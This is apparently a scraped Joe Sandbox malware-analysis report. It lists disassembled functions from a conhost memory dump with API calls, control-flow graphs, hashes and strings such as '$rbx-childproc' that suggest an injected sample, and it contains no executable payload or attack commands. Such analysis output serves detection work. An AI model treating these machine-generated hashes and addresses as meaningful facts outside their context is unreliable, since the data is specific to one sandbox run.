                                            Function 000001780DD234B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Utilization Percentage
                                            • API String ID: 1943346504-3507739905
                                            • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction ID: cf0f0535149f907ed6df802c35c032c5b267785c978d89895d4f08ecbfb53be9
                                            • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction Fuzzy Hash: 15312A32658B418BFB54DF62A88C7AD63B1FB94F94F444129AE4E43764EF3CD48A8610
                                            Function 000001780D3E962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000003.2868452616.000001780D3E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001780D3E0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_3_1780d3e0000_conhost.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction ID: 7d3e4dd4b021e778d156fa92050ae1e0ec6b5e424274611f332f33558b4ee2b3
                                            • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction Fuzzy Hash: 3AD15872A487808AEB609F6594883ED77B0F796788F110115FA8D57BD6EF34C4C9CB20
                                            Function 000001780DD2A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 313 1780dd2a22c-1780dd2a294 call 1780dd2b144 316 1780dd2a29a-1780dd2a29d 313->316 317 1780dd2a6f5-1780dd2a6fb call 1780dd2c388 313->317 316->317 318 1780dd2a2a3-1780dd2a2a9 316->318 320 1780dd2a378-1780dd2a38a 318->320 321 1780dd2a2af-1780dd2a2b3 318->321 323 1780dd2a390-1780dd2a394 320->323 324 1780dd2a645-1780dd2a649 320->324 321->320 325 1780dd2a2b9-1780dd2a2c4 321->325 323->324 326 1780dd2a39a-1780dd2a3a5 323->326 328 1780dd2a64b-1780dd2a652 324->328 329 1780dd2a682-1780dd2a68c call 1780dd29324 324->329 325->320 327 1780dd2a2ca-1780dd2a2cf 325->327 326->324 331 1780dd2a3ab-1780dd2a3af 326->331 327->320 332 1780dd2a2d5-1780dd2a2df call 1780dd29324 327->332 328->317 333 1780dd2a658-1780dd2a67d call 1780dd2a6fc 328->333 329->317 339 1780dd2a68e-1780dd2a6ad call 1780dd28070 329->339 335 1780dd2a575-1780dd2a581 331->335 336 1780dd2a3b5-1780dd2a3f0 call 1780dd29704 331->336 332->339 347 1780dd2a2e5-1780dd2a310 call 1780dd29324 * 2 call 1780dd29a0c 332->347 333->329 335->329 340 1780dd2a587-1780dd2a58b 335->340 336->335 351 1780dd2a3f6-1780dd2a3ff 336->351 344 1780dd2a59b-1780dd2a5a3 340->344 345 1780dd2a58d-1780dd2a599 call 1780dd299cc 340->345 344->329 350 1780dd2a5a9-1780dd2a5b6 call 1780dd295a4 344->350 345->344 357 1780dd2a5bc-1780dd2a5c4 345->357 380 1780dd2a312-1780dd2a316 347->380 381 1780dd2a330-1780dd2a33a call 1780dd29324 347->381 350->329 350->357 355 1780dd2a403-1780dd2a435 351->355 359 1780dd2a43b-1780dd2a447 355->359 360 1780dd2a568-1780dd2a56f 355->360 362 1780dd2a5ca-1780dd2a5ce 357->362 363 1780dd2a6d8-1780dd2a6f4 call 1780dd29324 * 2 call 1780dd2c2f4 357->363 359->360 364 1780dd2a44d-1780dd2a46c 359->364 360->335 360->355 368 1780dd2a5d0-1780dd2a5df call 1780dd299cc 362->368 369 1780dd2a5e1 362->369 363->317 370 1780dd2a558-1780dd2a55d 364->370 371 1780dd2a472-1780dd2a4af call 1780dd299e0 * 2 364->371 376 1780dd2a5e3-1780dd2a5ed call 1780dd2b1dc 368->376 369->376 370->360 393 1780dd2a4e2-1780dd2a4e5 371->393 376->329 391 1780dd2a5f3-1780dd2a643 call 1780dd29634 call 1780dd29838 376->391 380->381 385 1780dd2a318-1780dd2a323 380->385 381->320 396 1780dd2a33c-1780dd2a35c call 1780dd29324 * 2 call 1780dd2b1dc 381->396 385->381 390 1780dd2a325-1780dd2a32a 385->390 390->317 390->381 391->329 399 1780dd2a4b1-1780dd2a4d7 call 1780dd299e0 call 1780dd2a96c 393->399 400 1780dd2a4e7-1780dd2a4ee 393->400 418 1780dd2a35e-1780dd2a368 call 1780dd2b2cc 396->418 419 1780dd2a373 396->419 414 1780dd2a4f9-1780dd2a556 call 1780dd2a158 399->414 415 1780dd2a4d9-1780dd2a4dc 399->415 404 1780dd2a55f 400->404 405 1780dd2a4f0-1780dd2a4f4 400->405 406 1780dd2a564 404->406 405->371 406->360 414->406 415->393 423 1780dd2a36e-1780dd2a6d1 call 1780dd28f84 call 1780dd2ad28 call 1780dd29178 418->423 424 1780dd2a6d2-1780dd2a6d7 call 1780dd2c2f4 418->424 419->320 423->424 424->363
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction ID: c17053fdacf8eb826a2853192dccf7a5195dd69367fbb25f8bf3f672292c638a
                                            • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction Fuzzy Hash: 8ED14632688B80CAEB209F65944D3EE77B0F765798F101116EE8D57B9ADF38C5C9CA10
                                            Function 000001780DD2104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 434 1780dd2104c-1780dd210b9 RegQueryInfoKeyW 435 1780dd210bf-1780dd210c9 434->435 436 1780dd211b5-1780dd211d0 434->436 435->436 437 1780dd210cf-1780dd2111f RegEnumValueW 435->437 438 1780dd211a5-1780dd211af 437->438 439 1780dd21125-1780dd2112a 437->439 438->436 438->437 439->438 440 1780dd2112c-1780dd21135 439->440 441 1780dd21147-1780dd2114c 440->441 442 1780dd21137 440->442 444 1780dd21199-1780dd211a3 441->444 445 1780dd2114e-1780dd21193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 441->445 443 1780dd2113b-1780dd2113f 442->443 443->438 446 1780dd21141-1780dd21145 443->446 444->438 445->444 446->441 446->443
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction ID: ea1fbaa8ed2d3f4824ceec1da656d7592b14ac1c2b2587faadc25cca925575ca
                                            • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction Fuzzy Hash: DA412A33258B84DAE761CF21E4497AE77B1F388B98F448129EA8907658DF3CC589CB50
                                            Function 000001780DD22518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                            • String ID: \\.\pipe\$rbx-childproc
                                            • API String ID: 166002920-1828357524
                                            • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction ID: dc7e3b243a0ed60b80b48adc88abd4dbf5ad99ba31ecade5562d44a1ba9a60c2
                                            • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction Fuzzy Hash: 31112632658B4083F7108F21F95D39EA770F389B94F944215FE9902AA8CF7DC188CB50
                                            Function 000001780D3E7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000003.2868452616.000001780D3E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001780D3E0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_3_1780d3e0000_conhost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: 84cf9101b22363768606626acb495282c9f876ffe20dff33920f4d01ee9921a4
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: 00819EB168C34586FB64AF65A8493DD62B0AB87780F174015BA4C877D6FE39C8CE8760
                                            Function 000001780DD27C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 452 1780dd27c50-1780dd27c56 453 1780dd27c58-1780dd27c5b 452->453 454 1780dd27c91-1780dd27c9b 452->454 455 1780dd27c5d-1780dd27c60 453->455 456 1780dd27c85-1780dd27cc4 call 1780dd282f0 453->456 457 1780dd27db8-1780dd27dcd 454->457 458 1780dd27c78 __scrt_dllmain_crt_thread_attach 455->458 459 1780dd27c62-1780dd27c65 455->459 472 1780dd27cca-1780dd27cdf call 1780dd28184 456->472 473 1780dd27d92 456->473 460 1780dd27dcf 457->460 461 1780dd27ddc-1780dd27df6 call 1780dd28184 457->461 467 1780dd27c7d-1780dd27c84 458->467 463 1780dd27c71-1780dd27c76 call 1780dd28234 459->463 464 1780dd27c67-1780dd27c70 459->464 465 1780dd27dd1-1780dd27ddb 460->465 475 1780dd27e2b-1780dd27e5c call 1780dd284b0 461->475 476 1780dd27df8-1780dd27e29 call 1780dd282ac call 1780dd2814c call 1780dd28634 call 1780dd28450 call 1780dd28474 call 1780dd282dc 461->476 463->467 484 1780dd27daa-1780dd27db7 call 1780dd284b0 472->484 485 1780dd27ce5-1780dd27cf6 call 1780dd281f4 472->485 477 1780dd27d94-1780dd27da9 473->477 486 1780dd27e5e-1780dd27e64 475->486 487 1780dd27e6d-1780dd27e73 475->487 476->465 484->457 503 1780dd27cf8-1780dd27d1c call 1780dd285f8 call 1780dd2813c call 1780dd28168 call 1780dd2b428 485->503 504 1780dd27d47-1780dd27d51 call 1780dd28450 485->504 486->487 491 1780dd27e66-1780dd27e68 486->491 492 1780dd27eb5-1780dd27ecb call 1780dd23a1c 487->492 493 1780dd27e75-1780dd27e7f 487->493 498 1780dd27f52-1780dd27f5f 491->498 513 1780dd27ecd-1780dd27ecf 492->513 514 1780dd27f03-1780dd27f05 492->514 499 1780dd27e81-1780dd27e84 493->499 500 1780dd27e86-1780dd27e8c 493->500 506 1780dd27e8e-1780dd27e94 499->506 500->506 503->504 554 1780dd27d1e-1780dd27d25 __scrt_dllmain_after_initialize_c 503->554 504->473 526 1780dd27d53-1780dd27d5f call 1780dd284a0 504->526 509 1780dd27e9a-1780dd27eaf call 1780dd27c50 506->509 510 1780dd27f48-1780dd27f50 506->510 509->492 509->510 510->498 513->514 521 1780dd27ed1-1780dd27ef3 call 1780dd23a1c call 1780dd27db8 513->521 516 1780dd27f0c-1780dd27f21 call 1780dd27c50 514->516 517 1780dd27f07-1780dd27f0a 514->517 516->510 535 1780dd27f23-1780dd27f2d 516->535 517->510 517->516 521->514 549 1780dd27ef5-1780dd27efa 521->549 542 1780dd27d61-1780dd27d6b call 1780dd283b8 526->542 543 1780dd27d85-1780dd27d90 526->543 540 1780dd27f2f-1780dd27f32 535->540 541 1780dd27f34-1780dd27f42 535->541 546 1780dd27f44 540->546 541->546 542->543 553 1780dd27d6d-1780dd27d7b 542->553 543->477 546->510 549->514 553->543 554->504 555 1780dd27d27-1780dd27d44 call 1780dd2b3f0 554->555 555->504
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: d8c55596eb12a747781e28e93d410d35fdb994d562d8463e25c853f17013c2a6
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: 6681AC3168C641D7FBA4AF65984E3FD62B1ABA5784F444015BE4C47796DE3CC8CE9320
                                            Function 000001780DD29AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 558 1780dd29aac-1780dd29aea 559 1780dd29b9e 558->559 560 1780dd29af0-1780dd29af3 558->560 561 1780dd29ba0-1780dd29bbc 559->561 560->561 562 1780dd29af9-1780dd29afc 560->562 563 1780dd29b02-1780dd29b11 562->563 564 1780dd29b96 562->564 565 1780dd29b1e-1780dd29b3d LoadLibraryExW 563->565 566 1780dd29b13-1780dd29b16 563->566 564->559 569 1780dd29b3f-1780dd29b48 GetLastError 565->569 570 1780dd29bbd-1780dd29bd2 565->570 567 1780dd29b1c 566->567 568 1780dd29bdd-1780dd29bec GetProcAddress 566->568 572 1780dd29b89-1780dd29b90 567->572 568->564 571 1780dd29bee-1780dd29bf9 568->571 573 1780dd29b4a-1780dd29b5f call 1780dd2c4d8 569->573 574 1780dd29b77-1780dd29b81 569->574 570->568 575 1780dd29bd4-1780dd29bd7 FreeLibrary 570->575 571->561 572->563 572->564 573->574 578 1780dd29b61-1780dd29b75 LoadLibraryExW 573->578 574->572 575->568 578->570 578->574
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,000001780DD29C6B,?,?,?,000001780DD2945C,?,?,?,?,000001780DD28F65), ref: 000001780DD29B31
                                            • GetLastError.KERNEL32(?,?,?,000001780DD29C6B,?,?,?,000001780DD2945C,?,?,?,?,000001780DD28F65), ref: 000001780DD29B3F
                                            • LoadLibraryExW.KERNEL32(?,?,?,000001780DD29C6B,?,?,?,000001780DD2945C,?,?,?,?,000001780DD28F65), ref: 000001780DD29B69
                                            • FreeLibrary.KERNEL32(?,?,?,000001780DD29C6B,?,?,?,000001780DD2945C,?,?,?,?,000001780DD28F65), ref: 000001780DD29BD7
                                            • GetProcAddress.KERNEL32(?,?,?,000001780DD29C6B,?,?,?,000001780DD2945C,?,?,?,?,000001780DD28F65), ref: 000001780DD29BE3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction ID: 2b15533f00ba9dc8b919ba90b151ec0fb837988f3a36d2f4744104f7e302508d
                                            • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction Fuzzy Hash: 9B31813229A640D2FF119F16A85C7FD23A4BB69BA0F590525BD1D46794DF3CD4888B20
                                            Function 000001780DD33400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction ID: f40eb104276be7e3c5d309babbccafb74b3a9d1ce55e3d9f6096cf8f6a418cf0
                                            • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction Fuzzy Hash: 63117C32258A4087F7608F52F95D75D66B4B388BE4F400214FE5E87B94CF39C4888750
                                            Function 000001780DD26270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction ID: 4c148bcb012db578a35488b3bb0a1ca808f318d5a6d8d2e91a98e9fddbfb3e33
                                            • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction Fuzzy Hash: 91D17736248B88C2DB709F1AE4983AE67B0F798B88F100116EE8D477A5DF3DC595CB14
                                            Function 000001780DD22098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Free$CurrentThread
                                            • String ID:
                                            • API String ID: 564911740-0
                                            • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction ID: d6bf33a17e24bebd04fa7016bea5e4aeaa23213af62f26452fafe3eaf071d988
                                            • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction Fuzzy Hash: 9251AB32289B45D7EB45DF28EC9D6EC23B1BB64744F840815BD2D066A6EF78C5ACC360
                                            Function 000001780DD235C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: $rbx-
                                            • API String ID: 756756679-3661604363
                                            • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction ID: fffa67e93c2e7d498c89cb70cfee96b76328fd729bbd0b6dd9921f42ffa0a63d
                                            • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction Fuzzy Hash: 57315B32749B55C3EB15DF16A94C6AE63B4BB64B85F088428EE4C07B55EF3CC4E98720
                                            Function 000001780DD2C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: ErrorLast$Value$FreeHeap
                                            • String ID:
                                            • API String ID: 365477584-0
                                            • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction ID: dd3288fb573f11bdfa44e14746a2d6a651e4c4db2a50529703e590243aaa8b59
                                            • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction Fuzzy Hash: 1A113D3229824083FB546F36681D7FE2272AFA9790F544624BD6E563CADE3CC8894260
                                            Function 000001780DD21A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
